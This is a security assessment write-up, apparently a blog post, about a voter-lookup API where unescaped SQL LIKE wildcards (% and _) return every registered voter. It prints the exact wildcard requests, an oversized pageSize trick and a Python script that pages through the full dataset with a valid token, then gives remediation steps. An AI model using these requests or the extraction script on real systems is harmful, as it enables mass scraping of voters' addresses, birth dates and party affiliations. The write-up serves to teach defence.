Searching for Every Voter With a Single Percent Sign
The platform was straightforward. A civic technology application that allowed authorized users — election officials, campaign volunteers, poll workers — to look up registered voters by name. Type a name, get a match. Standard search functionality that exists on thousands of government platforms.
The search field had a magnifying glass icon and a placeholder that read "Search by last name." Nothing about it suggested it would become the most interesting part of the assessment.
The Search That Returned Too Much
During the initial reconnaissance phase, I used the search function as intended. Typed a common last name, got a paginated list of results. The API behind it was clean — a single endpoint that accepted a query parameter and returned matching records:
GET /api/v1/voters/search?q=Smith
The response came back with a JSON array of voter records:
```json
{
  "results": [
    {
      "id": "VR-2847291",
      "firstName": "James",
      "lastName": "Smith",
      "dateOfBirth": "1985-03-14",
      "address": "1247 Oak Street, Apt 3B",
      "city": "Springfield",
      "state": "IL",
      "zip": "62704",
      "registrationDate": "2012-09-22",
      "status": "Active",
      "partyAffiliation": "Independent"
    }
  ],
  "total": 1847,
  "page": 1,
  "pageSize": 25
}
```

Full names, home addresses, dates of birth, party affiliations. This was expected — it was the purpose of the application. The question was whether the search enforced any boundaries on what an authorized user could extract.
I started with the obvious tests. Empty string, single letter, special characters. Then I tried the percent sign:
GET /api/v1/voters/search?q=%25
The %25 is the URL-encoded form of %. The server decoded it, dropped it into a query, and the response came back:
```json
{
  "results": [
    { "id": "VR-0000001", "firstName": "Aaron", "lastName": "Aaberg", ... },
    { "id": "VR-0000002", "firstName": "Maria", "lastName": "Aaland", ... },
    { "id": "VR-0000003", "firstName": "Robert", "lastName": "Aames", ... }
  ],
  "total": 3847291,
  "page": 1,
  "pageSize": 25
}
```

3,847,291 results. Every registered voter in the system. Sorted alphabetically, paginated in chunks of 25 — and the pagination worked. Page 2, page 3, page 153,891. Every page returned the next 25 records, all the way to the end of the database.
Why It Worked
The backend was wrapping user input in a SQL LIKE clause for partial matching:
```sql
SELECT * FROM voters WHERE last_name LIKE '%' || $1 || '%'
```

When the input itself is %, the pattern becomes LIKE '%%%' — three wildcards that match every row in the table. The query was parameterized, so traditional SQL injection was blocked. But the LIKE clause worked exactly as designed. The application never sanitized wildcard metacharacters, so the percent sign was not an injection — it was a valid pattern that happened to mean "return everything."
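The behavior is easy to reproduce against any SQL engine. The sketch below uses an in-memory SQLite table as a stand-in for the real voters table (the schema and names are illustrative, not from the assessment) to show that a fully parameterized LIKE query still honors wildcards that arrive as data:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE voters (last_name TEXT)")
conn.executemany(
    "INSERT INTO voters VALUES (?)",
    [("Aaberg",), ("Smith",), ("Lee",)],
)

def search(q):
    # Parameterized query: immune to SQL injection, but LIKE still
    # interprets % and _ inside the bound value as wildcards.
    rows = conn.execute(
        "SELECT last_name FROM voters WHERE last_name LIKE '%' || ? || '%'",
        (q,),
    ).fetchall()
    return [r[0] for r in rows]

print(search("Smith"))  # one match, as intended
print(search("%"))      # every row in the table
```

The binding is doing its job — the input never becomes SQL syntax. It simply becomes a pattern that matches everything.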
The Scope of Exposure
The pagination endpoint had no upper bound. There was no maximum page number, no query timeout, and no limit on how many pages a single session could request. A simple script could iterate through every page and collect the full dataset:
```python
import requests

session = requests.Session()
session.headers.update({"Authorization": "Bearer <valid_token>"})

page = 1
all_records = []
while True:
    response = session.get(
        "https://platform.example/api/v1/voters/search",
        params={"q": "%", "page": page, "pageSize": 100},
    )
    data = response.json()
    all_records.extend(data["results"])
    # Stop once the pages requested so far cover the reported total.
    if page * 100 >= data["total"]:
        break
    page += 1

print(f"Collected {len(all_records)} records")
```

I modified the pageSize parameter as well. The default was 25, but the API accepted arbitrary values:
GET /api/v1/voters/search?q=%25&page=1&pageSize=10000
It returned 10,000 records in a single response. No server-side maximum. The only constraint was how large a JSON response the client was willing to parse.
With a pageSize of 10,000, the entire database could be extracted in under 400 requests. At the rate the server responded, that was roughly fifteen minutes of scripted pagination.
The Underscore Variant
The percent sign was not the only wildcard that worked. The underscore character (_) matches exactly one character in SQL LIKE syntax. This enabled more targeted extraction:
GET /api/v1/voters/search?q=___
Three underscores. Because the backend wraps input in its own % wildcards, the pattern '%___%' matched every last name at least three characters long. Less dramatic than dumping the entire database, but it confirmed that wildcard syntax was being interpreted directly, and combined with literal characters it enabled positional queries:
GET /api/v1/voters/search?q=S____
Every last name containing an S followed by at least four more characters. Combined with other data points, patterns like this could narrow searches to specific individuals by length and letter position, without knowing their exact name — a capability the application was not designed to provide.
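The same in-memory SQLite sketch (illustrative names, same wrapped-wildcard query shape as the vulnerable endpoint) shows what underscore patterns actually select:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE voters (last_name TEXT)")
conn.executemany(
    "INSERT INTO voters VALUES (?)",
    [("Li",), ("Lee",), ("Smith",), ("Stone",)],
)

def search(q):
    # Same shape as the vulnerable endpoint: input wrapped in % wildcards,
    # so each _ in the bound value consumes exactly one character.
    rows = conn.execute(
        "SELECT last_name FROM voters WHERE last_name LIKE '%' || ? || '%'",
        (q,),
    ).fetchall()
    return sorted(r[0] for r in rows)

print(search("___"))    # names with at least three characters
print(search("S____"))  # names containing S followed by four more characters
```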
What Made This Dangerous
The data exposed per record was substantial: full legal name, date of birth, home address, party affiliation, registration status, and registration date. This is the combination of fields that identity verification systems use. It is also the combination that enables targeted social engineering, voter intimidation, and identity fraud.
The volume amplified the impact. This was not a single record disclosed through an IDOR. It was the entire population of registered voters in the jurisdiction, extractable in bulk, by any user with a valid session token. Campaign volunteers, temporary poll workers, anyone with legitimate but limited-purpose access could execute this extraction.
The application had audit logging, but the logs recorded the HTTP request, not the semantic intent. A request to /api/v1/voters/search?q=%25 looked identical in structure to a request to /api/v1/voters/search?q=Johnson. Nothing in the logging infrastructure distinguished a legitimate name search from a full database extraction.
The Fix
The remediation required changes at multiple levels.
Escape wildcard characters in user input. Before passing user input into a LIKE clause, escape the % and _ characters so they are treated as literal characters, not wildcards:
```sql
-- Before: wildcards pass through
SELECT * FROM voters WHERE last_name LIKE '%' || $1 || '%'

-- After: wildcards escaped (the escape character itself first)
SELECT * FROM voters
WHERE last_name LIKE '%' ||
      replace(replace(replace($1, '\', '\\'), '%', '\%'), '_', '\_')
      || '%'
ESCAPE '\'
```

Note that the backslash must be escaped before % and _, or an attacker could supply their own escape sequences.

Enforce minimum input length. Reject searches shorter than two or three characters. A single-character search has no legitimate use case and should return an error, not results.
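The same escaping can live in application code instead of the query. A minimal sketch (the helper name and defaults are mine, not the platform's):

```python
def escape_like(value: str, escape_char: str = "\\") -> str:
    """Escape LIKE metacharacters so user input matches literally."""
    # The escape character itself must be handled first, or user-supplied
    # backslashes would combine with later substitutions.
    for ch in (escape_char, "%", "_"):
        value = value.replace(ch, escape_char + ch)
    return value

# The escaped value is then bound as a parameter, with the pattern
# using an explicit ESCAPE clause, e.g.:
#   ... WHERE last_name LIKE '%' || ? || '%' ESCAPE '\'
print(escape_like("%"))        # \%  -- now a literal percent sign
print(escape_like("O_Brien"))  # O\_Brien
```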
Cap result counts. Enforce a maximum total result count server-side. If a query matches more than a reasonable threshold — say 500 records — return an error asking the user to refine their search. Do not return the first 500 and tell them there are 3.8 million more.
Lock down page size. The server should enforce a maximum pageSize regardless of what the client requests. Accept 25, 50, or 100. Reject 10,000.
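Together, the input and pagination rules above amount to a small server-side validation layer. A sketch, with thresholds chosen for illustration rather than taken from the platform:

```python
ALLOWED_PAGE_SIZES = {25, 50, 100}  # illustrative whitelist
MIN_QUERY_LENGTH = 2
MAX_TOTAL_RESULTS = 500

def validate_search(q: str, page_size: int) -> None:
    """Reject requests that cannot be a legitimate name lookup."""
    if len(q.strip()) < MIN_QUERY_LENGTH:
        raise ValueError("query too short; refine your search")
    if page_size not in ALLOWED_PAGE_SIZES:
        raise ValueError("unsupported page size")

def check_result_count(total: int) -> None:
    """Fail closed instead of paginating a bulk extraction."""
    if total > MAX_TOTAL_RESULTS:
        raise ValueError("too many matches; refine your search")
```

The key design choice is failing closed: an over-broad query gets an error, not the first page of a 3.8-million-row result set.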
Add semantic audit logging. Log not just the request parameters but the result count. A search that returns 3.8 million matches should trigger an alert, regardless of what character was searched.
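Result-count logging can be a thin wrapper around the existing search handler. A sketch using Python's standard logging module (the logger name and threshold are assumptions for illustration):

```python
import logging

logger = logging.getLogger("voter_search_audit")
ALERT_THRESHOLD = 500  # illustrative; tune to real usage patterns

def audit_search(user_id: str, query: str, total: int) -> bool:
    """Log what a search returned; return True if it triggered an alert."""
    # Record the semantic outcome, not just the request parameters.
    logger.info("search user=%s q=%r total=%d", user_id, query, total)
    if total > ALERT_THRESHOLD:
        # No legitimate name lookup matches this much of the table.
        logger.warning("possible bulk extraction: user=%s total=%d",
                       user_id, total)
        return True
    return False
```

With this in place, q=Johnson and q=%25 no longer look identical in the logs — one returns dozens of rows, the other millions.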
The Deeper Lesson
This vulnerability did not require breaking anything. The SQL query was parameterized. The authentication was valid. The authorization model was correct — the user was permitted to search for voters. Every component worked exactly as designed.
The problem was a missing assumption. The developers assumed the search field would contain names. They did not account for the fact that SQL LIKE syntax has metacharacters, and that those metacharacters would be interpreted by the database engine even when delivered through parameterized queries.
Parameterized queries prevent SQL injection. They do not prevent SQL from doing what you told it to do. If you tell the database to match every row, it will match every row. The application has to decide what queries are acceptable, not just what queries are syntactically safe.
A search field that accepts % is a search field that accepts "return everything." That is not an injection. It is a feature — one that nobody intended to ship.